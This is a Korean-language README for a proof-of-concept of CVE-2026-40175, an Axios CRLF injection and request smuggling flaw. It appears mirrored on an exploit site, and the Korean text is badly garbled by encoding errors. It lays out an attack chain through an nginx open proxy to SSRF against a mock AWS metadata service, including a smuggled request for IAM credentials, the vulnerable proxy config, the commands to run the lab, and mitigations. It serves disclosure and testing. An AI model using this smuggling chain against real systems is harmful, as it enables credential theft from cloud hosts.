Share
## https://sploitus.com/exploit?id=93AE532A-5E5F-5573-AB01-41C96B1A7675
# CVE-2026-40175 β Axios CRLF Injection / HTTP Request Smuggling PoC
## κ°μ
Axios HTTP ν΄λΌμ΄μΈνΈ(`>=1.0.0 =1.0.0 <1.15.0`, `axios <0.31.0` |
| ν¨μΉ λ²μ | `1.15.0`, `0.31.0` |
| CWE | CWE-93 Improper Neutralization of CRLF Sequences |
---
## κ·Όλ³Έ μμΈ
```
lib/core/AxiosHeaders.js AxiosHeaders.set()
ββ normalizeValue()
ββ /[\r\n]+$/ λ‘ νν CRLFλ§ μ κ±°
β κ° μ€κ°μ \r\nμ κ·Έλλ‘ ν΅κ³Ό
```
κ²°κ³Όμ μΌλ‘ ν€λ κ°μ `\r\n\r\nGET /admin HTTP/1.1\r\n...`μ μ½μ
νλ©΄
TCP μ€νΈλ¦Όμ λ λ²μ§Έ HTTP μμ²μ΄ κ·Έλλ‘ ν¬ν¨λλ€.
---
## 곡격 체μΈ
```
[1] μ§μ ν€λ μ£Όμ
λλ Prototype Pollution
β
[2] axiosκ° CRLF ν¬ν¨ κ°μ κ²μ¦ μμ΄ ν€λλ‘ μ§λ ¬ν
β
[3] raw net.Socket μΌλ‘ TCP μ€νΈλ¦Όμ κΈ°λ‘
(Node.js κΈ°λ³Έ http λͺ¨λμ λ°νμμμ μ°¨λ¨ β custom adapter νμ)
β
[4] nginx (proxy_pass http://$http_host) κ° 2κ° μμ²μΌλ‘ λΆλ¦¬ νμ±
β
[5] μ€λ¨ΈκΈλ μμ²μ Host ν€λ κΈ°λ°μΌλ‘ λ€λ₯Έ upstream μΌλ‘ λΌμ°ν
(SSRF)
β
[6] λ΄λΆ μλ²(IMDS λ±) μ κ·Ό β ν¬λ λ΄μ
νμ·¨
```
### ν΅μ¬ 쑰건
| 쑰건 | λ΄μ© |
|---|---|
| Node.js http λͺ¨λ μ°ν | `net.Socket` κΈ°λ° custom adapter μ¬μ© |
| nginx open proxy | `proxy_pass http://$http_host` μ€μ |
| `ignore_invalid_headers on` | λΉμ μ ν€λ νμ© |
| `resolver` μ§μμ | λμ hostname ν΄μ κ°λ₯ |
---
## μν€ν
μ²
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Host Machine β
β β
β test-axios-adapter-*.js β
β (raw net.Socket β nginx:8080) β
β β
β browser β exploit.html (3003) β
β β relay (3004) β raw socket β nginx:8080 β
ββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββ
β Docker bridge (cve-net)
ββββββββββββΌβββββββββββ¬βββββββββββββββ
βΌ βΌ βΌ βΌ
backend nginx imds (future)
:3001 :8080 :80
:3003 (169.254.169.254 mock)
:3004
```
### ν¬νΈ λ§΅
| ν¬νΈ | μλΉμ€ | μν |
|---|---|---|
| 3001 | backend | HTTP μμ² μμ / ν€λ λ‘κΉ
|
| 3003 | backend | exploit.html μ μ μλ² |
| 3004 | backend | relay β browser POST β net.Socket λ³ν |
| 8080 | nginx | open proxy (`proxy_pass http://$http_host`) |
| 80 (λ΄λΆ) | imds | AWS IMDSv2 mock μλ² |
---
## μ€ν
```bash
# μ 체 컨ν
μ΄λ λΉλ λ° μμ
docker compose up --build
# Node.js ν
μ€νΈ (νΈμ€νΈμμ μ€ν)
npm install
```
### μλ리μ€λ³ ν
μ€νΈ
```bash
# 1. λ°±μλ μ§μ β CRLF μ£Όμ
μΌλ‘ 2κ° μμ² λ°μ
node poc/test-axios-adapter-backend.js
# 2. nginx κ²½μ β μ€λ¨ΈκΈλ μμ²μ΄ backend:3001 μΌλ‘ λΌμ°ν
node poc/test-axios-adapter-nginx.js
# 3. λΈλΌμ°μ β http://localhost:3003
# λμ μ ν: λ°±μλ μ§μ / nginx κ²½μ / nginx β IMDS (SSRF)
```
### IMDS SSRF μλ리μ€
```
1. nginx β IMDS μ ν ν Custom Adapter μ€ν
2. μ€λ¨ΈκΈλ μμ²: GET /latest/meta-data/iam/security-credentials/my-ec2-role
Host: imds
3. nginxκ° host=imds λ‘ λΌμ°ν
β IMDSv2 mock μλ²λ‘ μ λ¬
4. imds 컨ν
μ΄λ λ‘κ·Έ: [!!!] ν¬λ¦¬λ΄μ
νμ·¨ μ±κ³΅!
```
---
## νμΌ κ΅¬μ±
```
.
βββ docker-compose.yml
βββ Dockerfile.backend # backend + relay 컨ν
μ΄λ
βββ Dockerfile.imds # IMDSv2 mock 컨ν
μ΄λ
βββ package.json # axios@1.14.0 (μ·¨μ½ λ²μ κ³ μ )
βββ poc/
βββ backend-server.js # HTTP μλ² (3001), relay (3004), μ μ μλ² (3003)
βββ mock-imds.js # AWS IMDSv2 mock (PUT /token, GET /credentials)
βββ nginx-container.conf # open proxy μ€μ
βββ exploit.html # λΈλΌμ°μ PoC (XHR vs Custom Adapter)
βββ test-axios-adapter-backend.js # raw socket β backend μ§μ
βββ test-axios-adapter-nginx.js # raw socket β nginx β backend/imds
βββ test-axios-no-adapter.js # νμ€ axios (Node.js μ°¨λ¨ νμΈμ©)
```
---
## nginx μ€μ (ν΅μ¬)
```nginx
resolver 127.0.0.11 valid=30s; # Docker λ΄λΆ DNS
location / {
proxy_pass http://$http_host; # Host ν€λ κΈ°λ° λμ λΌμ°ν
= SSRF
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_set_header Host $http_host;
}
location /public {
proxy_pass http://backend:3001; # μ μ μμ²μ© κ³ μ upstream
}
```
`$http_host`(ν¬νΈ ν¬ν¨)λ₯Ό upstreamμΌλ‘ μ¬μ©νλ―λ‘, μ€λ¨ΈκΈλ μμ²μ Host ν€λκ°
κ³§ λΌμ°ν
λͺ©μ μ§κ° λλ€.
---
## μν
```bash
npm install axios@^1.15.0
```
ν¨μΉ(`1.15.0`)λ `assertValidHeaderValue()`λ₯Ό λμ
ν΄ CR/LF ν¬ν¨ κ°μ μ¦μ κ±°λΆνλ€.
μΆκ° λ°©μ΄:
- nginxμμ `proxy_pass http://$http_host` κΈμ§ β κ³ μ upstream μ¬μ©
- IMDSv2 μ μ© κ°μ (`HttpTokens: required`)
- EC2 μΈμ€ν΄μ€ νλ‘ν μ΅μ κΆν μ μ©
---
## References
- [NVD - CVE-2026-40175](https://nvd.nist.gov/vuln/detail/CVE-2026-40175)
- [Miggo Vulnerability DB](https://www.miggo.io/vulnerability-database/cve/CVE-2026-40175)
- [Aikido β Is it really exploitable?](https://www.aikido.dev/blog/axios-cve-2026-40175-a-critical-bug-thats-not-exploitable)
- [CVEReports](https://cvereports.com/reports/CVE-2026-40175)